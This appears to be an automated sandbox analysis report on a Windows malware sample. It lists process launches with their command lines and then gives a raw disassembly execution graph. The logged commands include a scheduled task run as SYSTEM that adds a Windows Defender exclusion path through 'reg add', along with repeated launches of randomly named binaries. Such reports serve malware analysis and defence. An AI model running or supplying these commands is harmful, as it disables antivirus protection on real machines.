                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:31
                                                                        Start time:23:12:14
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
                                                                        Imagebase:0x7ff6d1940000
                                                                        File size:235'008 bytes
                                                                        MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:32
                                                                        Start time:23:12:15
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:SCHTASKS /Run /TN "Task1"
                                                                        Imagebase:0x7ff6d1940000
                                                                        File size:235'008 bytes
                                                                        MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:33
                                                                        Start time:23:12:15
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                                        Imagebase:0x7ff6fb750000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:34
                                                                        Start time:23:12:15
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                        Imagebase:0x7ff6d1940000
                                                                        File size:235'008 bytes
                                                                        MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:35
                                                                        Start time:23:12:15
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff62cd90000
                                                                        File size:875'008 bytes
                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:36
                                                                        Start time:23:12:15
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\reg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                                        Imagebase:0x7ff74c110000
                                                                        File size:77'312 bytes
                                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:37
                                                                        Start time:23:12:49
                                                                        Start date:13/01/2025
                                                                        Path:C:\Program Files (x86)\DXESuT\DXESuT.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\DXESuT\DXESuT.exe"
                                                                        Imagebase:0xa0000
                                                                        File size:54'152 bytes
                                                                        MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:38
                                                                        Start time:23:12:51
                                                                        Start date:13/01/2025
                                                                        Path:C:\Program Files (x86)\DXESuT\DXESuT.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\DXESuT\DXESuT.exe"
                                                                        Imagebase:0xa0000
                                                                        File size:54'152 bytes
                                                                        MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:39
                                                                        Start time:23:12:51
                                                                        Start date:13/01/2025
                                                                        Path:C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe"
                                                                        Imagebase:0xf0000
                                                                        File size:54'152 bytes
                                                                        MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:40
                                                                        Start time:23:12:52
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:cmd /c echo.>c:\xxxx.ini
                                                                        Imagebase:0x1e0000
                                                                        File size:236'544 bytes
                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:41
                                                                        Start time:23:12:52
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff627590000
                                                                        File size:875'008 bytes
                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:42
                                                                        Start time:23:12:52
                                                                        Start date:13/01/2025
                                                                        Path:C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe"
                                                                        Imagebase:0xf0000
                                                                        File size:54'152 bytes
                                                                        MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:43
                                                                        Start time:23:12:52
                                                                        Start date:13/01/2025
                                                                        Path:C:\Program Files (x86)\DXESuT\DXESuT.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\DXESuT\DXESuT.exe"
                                                                        Imagebase:0xa0000
                                                                        File size:54'152 bytes
                                                                        MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:44
                                                                        Start time:23:13:01
                                                                        Start date:13/01/2025
                                                                        Path:C:\Program Files (x86)\DXESuT\DXESuT.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\DXESuT\DXESuT.exe"
                                                                        Imagebase:0xa0000
                                                                        File size:54'152 bytes
                                                                        MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:45
                                                                        Start time:23:13:01
                                                                        Start date:13/01/2025
                                                                        Path:C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe"
                                                                        Imagebase:0xf0000
                                                                        File size:54'152 bytes
                                                                        MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:46
                                                                        Start time:23:14:00
                                                                        Start date:13/01/2025
                                                                        Path:C:\Program Files (x86)\DXESuT\DXESuT.exe
                                                                        Wow64 process (32bit):
                                                                        Commandline:"C:\Program Files (x86)\DXESuT\DXESuT.exe"
                                                                        Imagebase:
                                                                        File size:54'152 bytes
                                                                        MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                        Has elevated privileges:
                                                                        Has administrator privileges:
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:47
                                                                        Start time:23:14:00
                                                                        Start date:13/01/2025
                                                                        Path:C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe
                                                                        Wow64 process (32bit):
                                                                        Commandline:"C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe"
                                                                        Imagebase:
                                                                        File size:54'152 bytes
                                                                        MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                        Has elevated privileges:
                                                                        Has administrator privileges:
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:48
                                                                        Start time:23:15:00
                                                                        Start date:13/01/2025
                                                                        Path:C:\Program Files (x86)\DXESuT\DXESuT.exe
                                                                        Wow64 process (32bit):
                                                                        Commandline:"C:\Program Files (x86)\DXESuT\DXESuT.exe"
                                                                        Imagebase:
                                                                        File size:54'152 bytes
                                                                        MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                        Has elevated privileges:
                                                                        Has administrator privileges:
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:49
                                                                        Start time:23:15:00
                                                                        Start date:13/01/2025
                                                                        Path:C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe
                                                                        Wow64 process (32bit):
                                                                        Commandline:"C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe"
                                                                        Imagebase:
                                                                        File size:54'152 bytes
                                                                        MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                        Has elevated privileges:
                                                                        Has administrator privileges:
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:50
                                                                        Start time:23:16:00
                                                                        Start date:13/01/2025
                                                                        Path:C:\Program Files (x86)\DXESuT\DXESuT.exe
                                                                        Wow64 process (32bit):
                                                                        Commandline:"C:\Program Files (x86)\DXESuT\DXESuT.exe"
                                                                        Imagebase:
                                                                        File size:54'152 bytes
                                                                        MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                        Has elevated privileges:
                                                                        Has administrator privileges:
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:51
                                                                        Start time:23:16:00
                                                                        Start date:13/01/2025
                                                                        Path:C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe
                                                                        Wow64 process (32bit):
                                                                        Commandline:"C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe"
                                                                        Imagebase:
                                                                        File size:54'152 bytes
                                                                        MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                        Has elevated privileges:
                                                                        Has administrator privileges:
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:52
                                                                        Start time:23:16:08
                                                                        Start date:13/01/2025
                                                                        Path:C:\ProgramData\dTuXOGtw.exe
                                                                        Wow64 process (32bit):
                                                                        Commandline:
                                                                        Imagebase:
                                                                        File size:1'589'760 bytes
                                                                        MD5 hash:337AEF8FF9C35846732FC8CBF416C0A7
                                                                        Has elevated privileges:
                                                                        Has administrator privileges:
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:53
                                                                        Start time:23:17:00
                                                                        Start date:13/01/2025
                                                                        Path:C:\Program Files (x86)\DXESuT\DXESuT.exe
                                                                        Wow64 process (32bit):
                                                                        Commandline:
                                                                        Imagebase:
                                                                        File size:54'152 bytes
                                                                        MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                        Has elevated privileges:
                                                                        Has administrator privileges:
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:54
                                                                        Start time:23:17:00
                                                                        Start date:13/01/2025
                                                                        Path:C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe
                                                                        Wow64 process (32bit):
                                                                        Commandline:
                                                                        Imagebase:
                                                                        File size:54'152 bytes
                                                                        MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                        Has elevated privileges:
                                                                        Has administrator privileges:
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:2.1%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:32.3%
                                                                          Total number of Nodes:458
                                                                          Total number of Limit Nodes:10
                                                                          execution_graph 13967 140005df3 13968 140005e71 13967->13968 13969 140005e84 CreateFileA 13968->13969 13970 140005f50 13969->13970 13971 140005fc3 malloc ReadFile 13970->13971 15147 140007412 15148 140007333 15147->15148 15149 140007403 15148->15149 15150 1400073e0 LdrLoadDll 15148->15150 15150->15148 16750 7ffaadbe11b0 16751 7ffaadbe1209 16750->16751 16755 7ffaadbe12c7 16751->16755 16756 7ffaadbe129e 16751->16756 16766 7ffaadbe12b9 16751->16766 16767 7ffaadbe14f0 16751->16767 16768 7ffaadbe1300 16751->16768 16752 7ffaadbe1b90 51 API calls 16752->16768 16753 7ffaadbe1b70 8 API calls 16757 7ffaadbe14d3 16753->16757 16758 7ffaadbe1b90 51 API calls 16755->16758 16759 7ffaadbe14f6 16756->16759 16769 7ffaadbe1b90 16756->16769 16758->16766 16781 7ffaadbe1110 16759->16781 16764 7ffaadbe14eb 16765 7ffaadbe79cc 47 API calls 16764->16765 16765->16767 16766->16752 16778 7ffaadbe1a40 16767->16778 16768->16753 16771 7ffaadbe1b9b 16769->16771 16770 7ffaadbe12b0 16770->16764 16770->16766 16771->16770 16772 7ffaadbe7a4c 2 API calls 16771->16772 16773 7ffaadbe1bba 16771->16773 16772->16771 16774 7ffaadbe1bc5 16773->16774 16787 7ffaadbe21f0 16773->16787 16775 7ffaadbe1110 51 API calls 16774->16775 16777 7ffaadbe1bcb 16775->16777 16791 7ffaadbe1b34 16778->16791 16782 7ffaadbe111e 16781->16782 16783 7ffaadbe3990 2 API calls 16782->16783 16784 7ffaadbe112f 16783->16784 16785 7ffaadbe379c 49 API calls 16784->16785 16786 7ffaadbe1159 16785->16786 16788 7ffaadbe21fe 16787->16788 16789 7ffaadbe3990 2 API calls 16788->16789 16790 7ffaadbe220f 16789->16790 16796 7ffaadbe1ab0 16791->16796 16794 7ffaadbe3990 2 API calls 16795 7ffaadbe1b56 16794->16795 16797 7ffaadbe379c 49 API calls 16796->16797 16798 7ffaadbe1ae4 16797->16798 16798->16794 15543 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15546 1400054e0 15543->15546 15545 1400136ef 15547 14000552c 15546->15547 15551 140005506 15546->15551 15548 1400074d0 LdrLoadDll 15547->15548 15549 140005536 15548->15549 15550 140008370 3 API calls 15549->15550 15552 140005545 15550->15552 15551->15545 15553 1400055b8 15552->15553 15556 1400074f0 LdrLoadDll 15552->15556 15554 140008de0 2 API calls 15553->15554 15555 1400055c0 15554->15555 15555->15551 15557 140005561 CreateThread 15556->15557 15557->15555 15558 1400055b0 GetLastError 15557->15558 15558->15553 13976 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 13977 140005ab1 13976->13977 13978 140005add GetVersionExA 13976->13978 13981 140005abf 13977->13981 14026 140009540 13977->14026 13979 140005b0e GetProcessHeap HeapFree 13978->13979 13980 140005af0 GetProcessHeap HeapFree 13978->13980 13986 140005b3c 13979->13986 13983 140005d0b 13980->13983 14034 140009300 13981->14034 13985 140005ac9 14045 140008510 GetModuleHandleA 13985->14045 14049 14000a310 HeapCreate 13986->14049 13989 140005bec 13990 140005c12 13989->13990 13991 140005bf0 13989->13991 13995 140005c17 13990->13995 13992 140005bfe 13991->13992 13993 140009540 12 API calls 13991->13993 13994 140009300 10 API calls 13992->13994 13993->13992 13996 140005c08 13994->13996 13997 140005c3d 13995->13997 13998 140005c29 13995->13998 14000 140009540 12 API calls 13995->14000 13999 140008510 3 API calls 13996->13999 14052 140009f50 GetStartupInfoA 13997->14052 14001 140009300 10 API calls 13998->14001 13999->13990 14000->13998 14002 140005c33 14001->14002 14004 140008510 3 API calls 14002->14004 14004->13997 14006 140005c56 14072 140009e30 14006->14072 14009 140005c5b 14090 140009c30 14009->14090 14013 140005c73 14014 140005c81 14013->14014 14015 1400084e0 12 API calls 14013->14015 14120 140009690 14014->14120 14015->14014 14017 140005c86 14018 140005c94 14017->14018 14019 1400084e0 12 API calls 14017->14019 14132 140008650 14018->14132 14019->14018 14021 140005c9e 14022 1400084e0 12 API calls 14021->14022 14023 140005ca9 14021->14023 14022->14023 14136 140001520 14023->14136 14025 140005ad3 14025->13983 14027 14000954e 14026->14027 14028 14000959c 14027->14028 14029 14000961c 14027->14029 14031 1400095c9 GetStdHandle 14027->14031 14030 140009300 10 API calls 14028->14030 14029->13981 14030->14029 14031->14028 14032 1400095dc 14031->14032 14032->14028 14033 1400095e2 WriteFile 14032->14033 14033->14028 14036 140009320 14034->14036 14035 140009330 14035->13985 14036->14035 14037 1400094dc GetStdHandle 14036->14037 14040 140009375 14036->14040 14037->14035 14038 1400094ef 14037->14038 14038->14035 14039 1400094f5 WriteFile 14038->14039 14039->14035 14040->14035 14041 1400093b9 GetModuleFileNameA 14040->14041 14042 1400093d9 14041->14042 14154 14000f000 14042->14154 14046 140008543 ExitProcess 14045->14046 14047 14000852a GetProcAddress 14045->14047 14047->14046 14048 14000853f 14047->14048 14048->14046 14050 14000a334 14049->14050 14051 14000a339 HeapSetInformation 14049->14051 14050->13989 14051->13989 14180 140008370 14052->14180 14054 140005c48 14054->14006 14065 1400084e0 14054->14065 14055 14000a1c4 GetStdHandle 14062 14000a17c 14055->14062 14056 140008370 3 API calls 14059 140009f8a 14056->14059 14057 14000a239 SetHandleCount 14057->14054 14058 14000a1d8 GetFileType 14058->14062 14059->14054 14059->14056 14060 14000a0e3 14059->14060 14059->14062 14060->14054 14061 14000a11c GetFileType 14060->14061 14060->14062 14185 14000edc0 14060->14185 14061->14060 14062->14054 14062->14055 14062->14057 14062->14058 14064 14000edc0 3 API calls 14062->14064 14064->14062 14066 140009540 12 API calls 14065->14066 14067 1400084ed 14066->14067 14068 140009300 10 API calls 14067->14068 14069 1400084f4 14068->14069 14070 1400073e0 LdrLoadDll 14069->14070 14071 140008500 14070->14071 14073 140009e7c 14072->14073 14074 140009e3e GetCommandLineW 14072->14074 14077 140009e81 GetCommandLineW 14073->14077 14078 140009e69 14073->14078 14075 140009e49 GetCommandLineW 14074->14075 14076 140009e5e GetLastError 14074->14076 14075->14076 14076->14078 14079 140009e75 14076->14079 14077->14078 14078->14079 14080 140009e91 GetCommandLineA MultiByteToWideChar 14078->14080 14079->14009 14081 140009ec8 14080->14081 14082 140009ed9 14080->14082 14081->14009 14083 140008370 3 API calls 14082->14083 14084 140009eeb 14083->14084 14085 140009f32 14084->14085 14086 140009ef3 MultiByteToWideChar 14084->14086 14085->14009 14087 140009f13 14086->14087 14088 140009f2a 14086->14088 14087->14009 14199 140008de0 14088->14199 14091 140009c52 GetEnvironmentStringsW 14090->14091 14092 140009c86 14090->14092 14093 140009c6c GetLastError 14091->14093 14099 140009c60 14091->14099 14094 140009c91 GetEnvironmentStringsW 14092->14094 14095 140009c77 14092->14095 14093->14092 14093->14095 14097 140005c67 14094->14097 14094->14099 14096 140009d09 GetEnvironmentStrings 14095->14096 14095->14097 14096->14097 14098 140009d17 14096->14098 14116 1400099c0 GetModuleFileNameW 14097->14116 14100 140009d58 14098->14100 14102 140009d20 MultiByteToWideChar 14098->14102 14099->14099 14204 140008300 14099->14204 14103 140008370 3 API calls 14100->14103 14102->14097 14102->14098 14107 140009d68 14103->14107 14105 140009ce1 14111 140009cef FreeEnvironmentStringsW 14105->14111 14106 140009cd1 FreeEnvironmentStringsW 14106->14097 14108 140009d7d 14107->14108 14109 140009d70 FreeEnvironmentStringsA 14107->14109 14110 140009de5 FreeEnvironmentStringsA 14108->14110 14112 140009d90 MultiByteToWideChar 14108->14112 14109->14097 14110->14097 14111->14097 14112->14108 14113 140009e0e 14112->14113 14114 140008de0 2 API calls 14113->14114 14115 140009e16 FreeEnvironmentStringsA 14114->14115 14115->14097 14117 140009a03 14116->14117 14118 140008300 17 API calls 14117->14118 14119 140009bca 14117->14119 14118->14119 14119->14013 14121 1400096b2 14120->14121 14122 1400096a8 14120->14122 14123 140008370 3 API calls 14121->14123 14122->14017 14131 1400096fa 14123->14131 14124 140009709 14124->14017 14125 1400097a5 14126 140008de0 2 API calls 14125->14126 14127 1400097b4 14126->14127 14127->14017 14128 140008370 3 API calls 14128->14131 14129 1400097e5 14130 140008de0 2 API calls 14129->14130 14130->14127 14131->14124 14131->14125 14131->14128 14131->14129 14134 140008666 14132->14134 14135 1400086bf 14134->14135 14220 140005380 14134->14220 14135->14021 14137 140001565 14136->14137 14138 140001569 14137->14138 14139 14000157e 14137->14139 14258 140001430 GetModuleFileNameW OpenSCManagerW 14138->14258 14142 140001595 OpenSCManagerW 14139->14142 14143 14000164f 14139->14143 14144 1400015b2 GetLastError 14142->14144 14145 1400015cf OpenServiceW 14142->14145 14146 140001654 14143->14146 14147 140001669 StartServiceCtrlDispatcherW 14143->14147 14144->14025 14148 140001611 DeleteService 14145->14148 14149 1400015e9 GetLastError CloseServiceHandle 14145->14149 14267 1400011f0 14146->14267 14147->14025 14152 140001626 CloseServiceHandle CloseServiceHandle 14148->14152 14153 14000161e GetLastError 14148->14153 14149->14025 14152->14025 14153->14152 14155 14000f01e 14154->14155 14156 14000f03b LoadLibraryA 14155->14156 14157 14000f125 14155->14157 14158 14000f054 GetProcAddress 14156->14158 14159 1400094c9 14156->14159 14172 14000f165 14157->14172 14177 1400073e0 LdrLoadDll 14157->14177 14158->14159 14160 14000f06d 14158->14160 14159->13985 14164 14000f075 GetProcAddress 14160->14164 14162 1400073e0 LdrLoadDll 14162->14159 14163 1400073e0 LdrLoadDll 14169 14000f1e9 14163->14169 14166 140007220 14164->14166 14168 14000f094 GetProcAddress 14166->14168 14167 1400073e0 LdrLoadDll 14167->14172 14171 14000f0b3 14168->14171 14170 1400073e0 LdrLoadDll 14169->14170 14173 14000f1a3 14169->14173 14170->14173 14171->14157 14174 14000f0e9 GetProcAddress 14171->14174 14172->14163 14172->14173 14173->14162 14175 14000f101 14174->14175 14175->14157 14176 14000f10d GetProcAddress 14175->14176 14176->14157 14178 140007333 14177->14178 14178->14177 14179 140007403 14178->14179 14179->14167 14182 1400083a0 14180->14182 14183 1400083be Sleep 14182->14183 14184 1400083e0 14182->14184 14191 14000e850 14182->14191 14183->14182 14183->14184 14184->14059 14186 1400073e0 LdrLoadDll 14185->14186 14187 14000edec 14186->14187 14188 14000ee26 GetModuleHandleA 14187->14188 14189 14000ee1d 14187->14189 14188->14189 14190 14000ee38 GetProcAddress 14188->14190 14189->14060 14190->14189 14192 14000e865 14191->14192 14193 14000e876 14192->14193 14194 14000e8be HeapAlloc 14192->14194 14196 1400090b0 14192->14196 14193->14182 14194->14192 14194->14193 14197 1400073e0 LdrLoadDll 14196->14197 14198 1400090c5 14197->14198 14198->14192 14200 140008de9 HeapFree 14199->14200 14201 140008e19 14199->14201 14200->14201 14202 140008dff 14200->14202 14201->14085 14203 140008e09 GetLastError 14202->14203 14203->14201 14205 140008320 14204->14205 14207 140008358 14205->14207 14208 140008338 Sleep 14205->14208 14209 1400090f0 14205->14209 14207->14105 14207->14106 14208->14205 14208->14207 14210 14000919e 14209->14210 14215 140009103 14209->14215 14211 1400090b0 LdrLoadDll 14210->14211 14213 1400091a3 14211->14213 14212 14000914c HeapAlloc 14212->14215 14216 140009173 14212->14216 14213->14205 14214 140009540 12 API calls 14214->14215 14215->14212 14215->14214 14215->14216 14217 1400090b0 LdrLoadDll 14215->14217 14218 140009300 10 API calls 14215->14218 14219 140008510 3 API calls 14215->14219 14216->14205 14217->14215 14218->14215 14219->14215 14223 140005250 14220->14223 14222 140005389 14222->14135 14224 140005271 14223->14224 14225 1400073e0 LdrLoadDll 14224->14225 14226 14000527e 14225->14226 14227 1400073e0 LdrLoadDll 14226->14227 14228 14000528d 14227->14228 14234 1400052f0 14228->14234 14235 140008490 14228->14235 14230 1400052b5 14231 1400052d9 14230->14231 14230->14234 14238 140008400 14230->14238 14233 140008400 7 API calls 14231->14233 14231->14234 14233->14234 14234->14222 14236 1400084c5 HeapSize 14235->14236 14237 140008499 14235->14237 14237->14230 14240 140008430 14238->14240 14241 140008472 14240->14241 14242 140008450 Sleep 14240->14242 14243 14000e920 14240->14243 14241->14231 14242->14240 14242->14241 14244 14000e935 14243->14244 14245 14000e94c 14244->14245 14255 14000e95e 14244->14255 14247 140008de0 2 API calls 14245->14247 14246 14000e9b1 14249 1400090b0 LdrLoadDll 14246->14249 14250 14000e951 14247->14250 14248 14000e973 HeapReAlloc 14251 14000e9b9 14248->14251 14248->14255 14249->14251 14250->14240 14251->14240 14252 14000e9f4 14254 14000e9f9 GetLastError 14252->14254 14253 1400090b0 LdrLoadDll 14253->14255 14254->14251 14255->14246 14255->14248 14255->14252 14255->14253 14256 14000e9db 14255->14256 14257 14000e9e0 GetLastError 14256->14257 14257->14251 14259 140001482 CreateServiceW 14258->14259 14260 14000147a GetLastError 14258->14260 14262 1400014ea GetLastError 14259->14262 14263 1400014df CloseServiceHandle 14259->14263 14261 1400014fd 14260->14261 14273 140004f30 14261->14273 14264 1400014f2 CloseServiceHandle 14262->14264 14263->14264 14264->14261 14266 14000150d 14266->14025 14268 1400011fa 14267->14268 14282 1400051d0 14268->14282 14271 140004f30 NtAllocateVirtualMemory 14272 140001262 14271->14272 14272->14025 14275 140004f39 14273->14275 14274 140004f44 14274->14266 14275->14274 14278 140006c95 14275->14278 14277 14000660e 14277->14266 14280 140006d7b 14278->14280 14281 140006d9d 14278->14281 14279 140006f95 NtAllocateVirtualMemory 14279->14281 14280->14279 14280->14281 14281->14277 14285 140008270 14282->14285 14284 140001238 MessageBoxW 14284->14271 14286 14000827e 14285->14286 14288 1400082ac 14285->14288 14286->14288 14289 140008120 14286->14289 14288->14284 14290 14000816a 14289->14290 14294 14000813b 14289->14294 14292 1400081d7 14290->14292 14290->14294 14295 140007f50 14290->14295 14293 140007f50 54 API calls 14292->14293 14292->14294 14293->14294 14294->14288 14305 140007f69 14295->14305 14296 140007f74 14296->14292 14297 14000801d 14298 1400080d5 14297->14298 14299 14000802f 14297->14299 14301 14000cc00 54 API calls 14298->14301 14300 14000804c 14299->14300 14304 140008081 14299->14304 14311 14000cc00 14300->14311 14302 140008056 14301->14302 14302->14292 14304->14302 14319 14000c2a0 14304->14319 14305->14296 14305->14297 14308 14000cd50 14305->14308 14309 140008300 17 API calls 14308->14309 14310 14000cd6a 14309->14310 14310->14297 14312 14000cc3f 14311->14312 14316 14000cc23 14311->14316 14312->14316 14327 14000fc50 14312->14327 14316->14302 14317 14000ccc5 14372 14000fd20 LeaveCriticalSection 14317->14372 14320 14000c2c3 14319->14320 14321 14000c2e0 14319->14321 14320->14302 14321->14320 14322 14000fc50 25 API calls 14321->14322 14323 14000c34e 14322->14323 14324 14000c1f0 2 API calls 14323->14324 14325 14000c367 14323->14325 14324->14325 14406 14000fd20 LeaveCriticalSection 14325->14406 14328 14000fc96 14327->14328 14329 14000fccb 14327->14329 14373 14000b400 14328->14373 14330 14000ccac 14329->14330 14331 14000fccf EnterCriticalSection 14329->14331 14330->14317 14337 14000c3f0 14330->14337 14331->14330 14340 14000c42e 14337->14340 14356 14000c427 14337->14356 14338 140004f30 NtAllocateVirtualMemory 14339 14000cbe6 14338->14339 14339->14317 14343 14000c4fb 14340->14343 14340->14356 14400 14000c1f0 14340->14400 14342 14000c841 14344 14000c86a 14342->14344 14345 14000cb20 WriteFile 14342->14345 14343->14342 14348 14000c526 GetConsoleMode 14343->14348 14347 14000c936 14344->14347 14352 14000c876 14344->14352 14346 14000cb53 GetLastError 14345->14346 14345->14356 14346->14356 14353 14000c940 14347->14353 14362 14000ca02 14347->14362 14348->14342 14349 14000c557 14348->14349 14349->14342 14350 14000c564 GetConsoleCP 14349->14350 14350->14356 14368 14000c581 14350->14368 14351 14000c8c5 WriteFile 14351->14352 14354 14000c928 GetLastError 14351->14354 14352->14351 14352->14356 14353->14356 14357 14000c991 WriteFile 14353->14357 14354->14356 14355 14000ca57 WideCharToMultiByte 14358 14000cb15 GetLastError 14355->14358 14355->14362 